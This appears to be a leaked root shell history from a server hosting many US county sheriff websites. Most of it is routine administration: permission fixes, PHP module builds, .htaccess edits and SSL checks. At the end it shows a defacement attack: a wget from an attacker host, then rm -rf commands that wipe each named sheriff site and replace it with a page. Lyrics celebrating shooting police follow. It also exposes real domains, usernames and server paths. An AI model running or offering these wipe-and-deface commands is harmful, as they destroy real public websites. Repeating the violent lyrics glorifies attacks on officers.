- find . -perm 777 -ls -type f
- find . -perm 777 -ls -type f -exec chmod 644 {} \;
- find . -perm 777 -type f -exec chmod 644 {} \;
- find -ls
- cd ..
- cd ..
- find . -perm 777
- find httpdocs -perm 777
- find httpdocs -perm 777 -ls
- chmod 755 httpdocs/admin/modules httpdocs/admin/modules/basic_page_editor
- httpdocs/admin/modules/most_wanted
- httpdocs/admin/modules/most_wanted/wanted_arrested
- httpdocs/admin/modules/press_releases httpdocs/admin/modules/sex_offenders
- httpdocs/config
- chmod 755 httpdocs/high_res httpdocs/images/inmates httpdocs/images/warrants
- httpdocs/uploads
- find httpdocs -perm 777 -ls
- chmod 644 httpdocs/config/injection_patch.php httpdocs/config/header.php
- httpdocs/cross_inmate.php
- cd ..
- ls
- find . -perm 777 -ls
- ls
- cd cityofgassville.org/
- find . -perm 777 -ls
- ;ll
- ll
- cd httpdocs/
- less core/master.tps
- ll
- less core/master.tps
- chmod 777 helpers
- chmod 777 core
- chmod 755 core
- chmod -R 777 core
- chmod -R 777 helpers
- ll
- chmod -R 777 core
- vi phpinfo.php
- rm phpinfo.php
- find core -ls
- less core/ini.tps
- find . sqlite_open
- find . -exec grep sqlite_open {} \;
- yum list | less
- vi phpinfo.php
- rm phpinfo.php
- cd /tmp
- rpm -ivh sqlite2-2.8.17-5.el5.i386.rpm
- service httpd restart
- yum install php-sqlite
- yum install php5-sqlite
- pec install sqlite
- pecl install sqlite
- pecl install sqlite2
- pecl install sqlite3
- pecl info sqlite
- pear install sqlite
- cd
- pecl download sqlite
- mkdir sl
- cd sl/
- tar -zxvf ../SQLite-1.0.3.tgz
- wget http://www.modphp.org/src/sqlite-1.0.3-byref_patch-1.0.patch
- less sqlite-1.0.3-byref_patch-1.0.patch
- patch -p1 < sqlite-1.0.3-byref_patch-1.0.patch
- tar -czf ../SQLite-1.0.3.tgz .
- pecl install SQLite-1.0.3.tgz
- service httpd restart
- vi /etc/php.d/pdo_sqlite.ini
- ll /var/tmp/pear-build-root/SQLite-1.0.3/modules
- cd /etc/php/d
- cd /etc/php.d
- ls
- cp pdo_sqlite.ini sqlite.ini
- vi sqlite.ini
- service httpd restart
- pwd
- cat sqlite.ini
- vi /etc/php.ini
- cd
- cd /var/www//vhosts/cityofgassville.org/
- ls
- cd httpdocs/
- ls
- ll
- less header.tps
- find . -perm 777 -ls
- find . -perm 777 -type f -exec chmod 644 {} \;
- find . -perm 777 -type d -exec chmod 755 {} \;
- ll
- cd ..
- cd ..
- ll
- cd kempercountysheriff.com/
- ls
- ll
- cd http
- cd httpdocs/
- ll
- find . -ls | less
- rm -rf test/
- ll
- find . -ls | less
- ls admin/
- cp ../../baxtercountysheriff.com/httpdocs/admin/.htaccess .
- vi .htaccess
- find . -ls | less
- ll
- chown 755 uploads high_res/
- chown apache:apache uploads high_res/
- chmod 1755 uploads high_res/
- ll
- find . -perm 777
- less ./uploads/watermark_wanted_photo.php
- ll ./uploads/watermark_wanted_photo.php
- chmod 644 ./uploads/watermark_wanted_photo.php
- chmod 644 ./uploads/arrested_big.png
- rm -f ./uploads/Thumbs.db
- cd ..
- cd ..
- ll
- cd marioncountysheriffar.com/
- find . -perm 777
- cd httpdocs/
- ll
- ls test
- rm -rf test
- chown apache:apache uploads/ high_res/
- chmod 1755 uploads/ high_res/
- cp ../../baxtercountysheriff.com/httpdocs/admin/.htaccess admin/
- vi admin/.htaccess
- ls
- ls ../../boonesheriff.com/httpdocs/admin/
- ll ../../boonesheriff.com/httpdocs/admin/
- cp ../../baxtercountysheriff.com/httpdocs/admin/.htaccess
- ../../boonesheriff.com/httpdocs/admin/
- ll -a ../../boonesheriff.com/httpdocs/admin/
- pwd
- find . -ls | less
- rm Thumbs.db
- ll admin/
- ll -a admin/
- cd ../../
- ll
- finder.pl .
- vi ~/bin/finder.pl
- finder.pl .
- vi ~/bin/finder.pl
- finder.pl .
- vi ~/bin/finder.pl
- finder.pl .
- vi ~/bin/finder.pl +16
- finder.pl .
- vi ~/bin/finder.pl +16
- cd baxtercountysheriff.com/
- find . -ls | less
- cd httpdocs/
- ls
- pwd
- ls test
- pwd
- mv test ..
- ls
- ll
- chown apache:apache high_res/ uploads/
- chmod 755 high_res/ uploads/
- ll
- chmod 1755 high_res/ uploads/
- ll
- ll config
- find . -perm 777
- find . -perm 777 -type f
- find . -perm 777 -type f -ls | less
- ll
- ps -ef | grep http
- find . -perm 777 -type f -ls -exec chmod 644 {} \;
- find . -perm 777 -type f -ls -exec chmod 644 {} \;
- ll
- find . -perm 777 -type d
- find . -perm 777 -type d -ls
- find . -perm 777 -type d -ls| less
- find admin -perm 777 -type d -exec chmod 755 {} \;
- find . -perm 777 -type d -ls| less
- find admin_dymin/ -perm 777 -type d -exec chmod 755 {} \;
- find . -perm 777 -type d -ls| less
- find blog config/ -perm 777 -type d -exec chmod 755 {} \;
- find . -perm 777 -type d -ls| less
- find uploads/ -perm 777 -type d -exec chmod 755 {} \;
- ls
- find . -perm 777 -type d -ls| less
- cd images/
- ll
- ls warrants/
- ll warrants/
- ls
- find . -perm 777 -type d -ls
- yum install mcrypt
- yum install php-mcrypt
- service httpd restart
- ll
- chown apache:apache warrants/ inmates/
- chmod 1755 warrants/ inmates/
- ll
- cd
- mv ~bjmsuper/id_dsa.pub .ssh/authorized_keys2
- vi /etc/ssh/sshd_config
- nohup service sshd restart
- cd
- cd .ssh/
- ll
- crontab -e
- /usr/sbin/ntpdate nist1-chi.ustiming.org
- crontab -l
- vi /etc/rsnapshot.exclude
- crontab -e
- /usr/sbin/ntpdate nist1-chi.ustiming.org 2&>1 >/dev/null
- cd
- cd /var/www/vhosts/
- cd marioncountysheriffar.com/
- ll
- cd httpdocs/
- ll
- cd ../../kempercountysheriff.com/
- ll
- cd httpdocs/
- ll
- ll -a admin/
- cd ..
- cd ..
- find . -name .htaccess
- cp ./marioncountysheriffar.com/httpdocs/admin/.htaccess
- kempercountysheriff.com/httpdocs/admin/
- vi kempercountysheriff.com/httpdocs/admin/.htaccess
- cd /var/www/vhosts/baxtercountysheriff.com/cd admin
- cd /var/www/vhosts/baxtercountysheriff.com/httpdocs/admin
- vi .htaccess
- exit
- passwd bjmsuper
- mailq
- openssl s_client -connect mostwantedwebsites.net:993 -ssl2
- openssl s_client -connect localhost.net:993 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:465 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:465
- openssl s_client -connect mail.mostwantedwebsites.net:993 -sslv
- openssl s_client -connect mail.mostwantedwebsites.net:993 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:995 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:443 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:443 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:443 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:443 -ssl2
- ping mail.mostwantedwebsites.net
- openssl s_client -connect mail.mostwantedwebsites.net:443 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:993 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:995 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:443 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:443 -ssl2
- vi /etc/httpd/conf.d/ssl.conf
- restart httpd
- /etc/init.d/httpd restart
- vi /etc/courier-imap/imapd-ssl
- vi /etc/courier-imap/pop3d-ssl
- /etc/init.d/courier-imap restart
- openssl s_client -connect mail.mostwantedwebsites.net:465 -ssl2
- openssl s_client -connect mail.mostwantedwebsites.net:465
- openssl s_client -connect mail.mostwantedwebsites.net:25
- add user bcsd_sync
- adduser bcsd_sync
- passwd bcsd_sync
- cd /var/www/vhosts/baxtercountysheriff.com/
- ls
- mkdir home
- ls /home
- ll /home
- rm home
- rm home -rf
- ll
- mv /home/bcsd_sync/ ./home
- ll
- vi /etc/passwd
- chown bcsd_sync:psacln home
- chmod 740 home
- ll
- exit
- cd /var/www/vhosts/adamscosheriff.org/httpdocs/
- ll
- find . -type d -exec chmod 0755 {} \;
- find . -type f -exec chmod 0644 {} \;
- ll
- chown -R apache:apache settings/ uploads/
- ll
- chmod -R 1755 settings/ uploads/
- ll
- cd /var/www/vhosts/sgcso.com/httpdocs/
- ll
- find . -type d -exec chmod 0755 {} \;
- find . -type f -exec chmod 0644 {} \;
- ll
- chown -R apache:apache uploads/ high_res/
- chmod -R 1755 uploads/ high_res/
- ll
- cd admin
- ll
- ll -a
- vi .htaccess
- ll -a
- cd /var/www/vhosts/bakercountysheriffoffice.org/httpdocs/
- ll
- find . -type d -exec chmod 0755 {} \;
- find . -type f -exec chmod 0644 {} \;
- chmod -R 1755 uploads/ high_res/
- chown -R apache:apache uploads/ high_res/
- ll
- cd admin/
- ll
- ll -a
- cd /var/www/vhosts/crosscountysheriff.org/
- cd httpdocs/
- ll
- cd admin/
- ll
- cd config/
- ll
- less connect.php
- vi connect.php
- vi connect.php
- cd /var/www/vhosts/polkcountymosheriff.org/httpdocs/
- ll
- ll
- cd /var/www/vhosts/marioncountysheriffar.com/httpdocs/
- ll
- cd /var/www/vhosts/bakercountysheriffoffice.org/httpdocs/
- ll
- // THIS TIME WE'RE NOT GONNA HESITATE TO PULL THE TRIGGER.
- # wget http://our.sekret.stash/index.html
- # rm -rf /var/www/vhosts/adamscosheriff.org/httpdocs/*; cp index.html
- /var/www/vhosts/adamscosheriff.org/httpdocs/;
- # rm -rf /var/www/vhosts/bakercountysheriffoffice.org/httpdocs/*; cp index.html
- /var/www/vhosts/bakercountysheriffoffice.org/httpdocs/;
- # rm -rf /var/www/vhosts/baxtercountysheriff.com/httpdocs/*; cp index.html
- /var/www/vhosts/baxtercountysheriff.com/httpdocs/;
- # rm -rf /var/www/vhosts/boonesheriff.com/httpdocs/*; cp index.html
- /var/www/vhosts/boonesheriff.com/httpdocs/;
- # rm -rf /var/www/vhosts/cityofgassville.org/httpdocs/*; cp index.html
- /var/www/vhosts/cityofgassville.org/httpdocs/;
- # rm -rf /var/www/vhosts/crosscountysheriff.org/httpdocs/*; cp index.html
- /var/www/vhosts/crosscountysheriff.org/httpdocs/;
- # rm -rf /var/www/vhosts/drewcountysheriff.com/httpdocs/*; cp index.html
- /var/www/vhosts/drewcountysheriff.com/httpdocs/;
- # rm -rf /var/www/vhosts/grantcountysheriff-collector.com/httpdocs/*; cp
- index.html /var/www/vhosts/grantcountysheriff-collector.com/httpdocs/;
- # rm -rf /var/www/vhosts/hodgemansheriff.us/httpdocs/*; cp index.html
- /var/www/vhosts/hodgemansheriff.us/httpdocs/;
- # rm -rf /var/www/vhosts/izardcountyar.org/httpdocs/*; cp index.html
- /var/www/vhosts/izardcountyar.org/httpdocs/;
- # rm -rf /var/www/vhosts/izardcountysheriff.org/httpdocs/*; cp index.html
- /var/www/vhosts/izardcountysheriff.org/httpdocs/;
- # rm -rf /var/www/vhosts/jocomosheriff.org/httpdocs/*; cp index.html
- /var/www/vhosts/jocomosheriff.org/httpdocs/;
- # rm -rf /var/www/vhosts/kempercountysheriff.com/httpdocs/*; cp index.html
- /var/www/vhosts/kempercountysheriff.com/httpdocs/;
- # rm -rf /var/www/vhosts/lawrencecosheriff.com/httpdocs/*; cp index.html
- /var/www/vhosts/lawrencecosheriff.com/httpdocs/;
- # rm -rf /var/www/vhosts/lcsdmo.com/httpdocs/*; cp index.html
- /var/www/vhosts/lcsdmo.com/httpdocs/;
- # rm -rf /var/www/vhosts/marioncountysheriffar.com/httpdocs/*; cp index.html
- /var/www/vhosts/marioncountysheriffar.com/httpdocs/;
- # rm -rf /var/www/vhosts/mcminncountysheriff.com/httpdocs/*; cp index.html
- /var/www/vhosts/mcminncountysheriff.com/httpdocs/;
- # rm -rf /var/www/vhosts/mostwantedgovernmentwebsites.com/httpdocs/*; cp
- index.html /var/www/vhosts/mostwantedgovernmentwebsites.com/httpdocs/;
- # rm -rf /var/www/vhosts/mostwantedwebsites.net/httpdocs/*; cp index.html
- /var/www/vhosts/mostwantedwebsites.net/httpdocs/;
- # rm -rf /var/www/vhosts/newtoncountysheriff.org/httpdocs/*; cp index.html
- /var/www/vhosts/newtoncountysheriff.org/httpdocs/;
- # rm -rf /var/www/vhosts/polkcountymosheriff.org/httpdocs/*; cp index.html
- /var/www/vhosts/polkcountymosheriff.org/httpdocs/;
- # rm -rf /var/www/vhosts/rcpi-ca.org/httpdocs/*; cp index.html
- /var/www/vhosts/rcpi-ca.org/httpdocs/;
- # rm -rf /var/www/vhosts/sgcso.com/httpdocs/*; cp index.html
- /var/www/vhosts/sgcso.com/httpdocs/;
- # rm -rf /var/www/vhosts/stonecountymosheriff.com/httpdocs/*; cp index.html
- /var/www/vhosts/stonecountymosheriff.com/httpdocs/;
- # rm -rf /var/www/vhosts/vbcso.com/httpdocs/*; cp index.html
- /var/www/vhosts/vbcso.com/httpdocs/";
- // I take a left at the light, turn off the headlights and ride real slow
- // Now holla at me when you see the 5-0
- // Alright Dirty, yall boys ready?
- // Bout to turn drive-bys revolutionary
- // *POW POW POW POW POW* YEAH MUTHAFUCKA YEAH!
- // *POW POW POW POW POW* YEAH MUTHAFUCKA YEAH!
- // Look at 'em run, too scared to pull they guns
- // Outta shape from them coffees and them cinnamon buns
- // This shit is fun, how I feel when the tables is turned
- // Hollow tips hit yah flesh through yo vests and it burn
- // That's a lesson you learn, comin straight from the slums
- // And it don't stop till we get full freedom